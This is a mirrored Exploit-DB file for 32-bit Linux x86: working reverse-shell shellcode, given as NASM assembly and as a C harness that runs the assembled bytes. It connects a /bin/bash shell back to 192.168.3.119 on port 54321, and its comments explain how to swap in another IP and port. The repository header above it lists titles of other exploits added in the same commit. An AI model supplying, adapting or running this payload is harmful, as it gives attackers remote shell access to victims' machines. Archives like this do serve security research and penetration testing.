bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/lin_x86/shellcode/41723.c
Offensive Security 1f8c35c0c0 DB: 2017-03-28 
25 new exploits

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)
Samba < 3.6.2 (x86) - Denial of Service (PoC)
Microsoft Visual Studio 2015 update 3 - Denial of Service
Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow
Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
Apple Safari - Out-of-Bounds Read when Calling Bound Function

QNAP QTS < 4.2.4 - Domain Privilege Escalation
Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
Github Enterprise - Default Session Secret And Deserialization (Metasploit)

B2B Alibaba Clone Script - SQL Injection
B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection
Just Another Video Script 1.4.3 - SQL Injection
Adult Tube Video Script - SQL Injection
Alibaba Clone Script - SQL Injection
B2B Marketplace Script 2.0 - SQL Injection
Php Real Estate Property Script - SQL Injection
Courier Tracking Software 6.0 - SQL Injection
Parcel Delivery Booking Script 1.0 - SQL Injection
Delux Same Day Delivery Script 1.0 - SQL Injection
Hotel Booking Script 1.0 - SQL Injection
Tour Package Booking 1.0 - SQL Injection
Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection
CouponPHP CMS 3.1 - 'code' Parameter SQL Injection
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection
Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)
inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
2017-03-28 05:01:16 +00:00

98 lines
2.2 KiB
C
Executable file
Raw Blame History

/*
; File name: reversebash.nasm
; Author: Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
; Link: ld -z execstack -o reversebash reversebash.o
; Use objdump to find shellcode and copy it over to the code section of the .c file
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2
global _start
section .text
_start:
jmp short call_shellcode
shellcode:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
pop edx
push 0x6
push 0x1
push 0x2
mov al, 0x66
mov bl, 0x1
mov ecx, esp
int 0x80
mov esi, eax
xor eax, eax
push eax
push dword [edx+2]
push word [edx]
push word 0x2
mov ecx, esp
push 0x10
push ecx
push esi
mov al, 0x66
mov bl, 0x3
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
loop:
dec cl
mov al, 0x3f
mov ebx, esi
int 0x80
mov esi, eax
jnz loop
xor eax, eax
xor ecx, ecx
push ecx
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx, esp
push ecx
push ebx
mov al, 0xb
mov ecx, esp
xor edx, edx
int 0x80
call_shellcode:
call shellcode
port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Reference in a new issue View git blame Copy permalink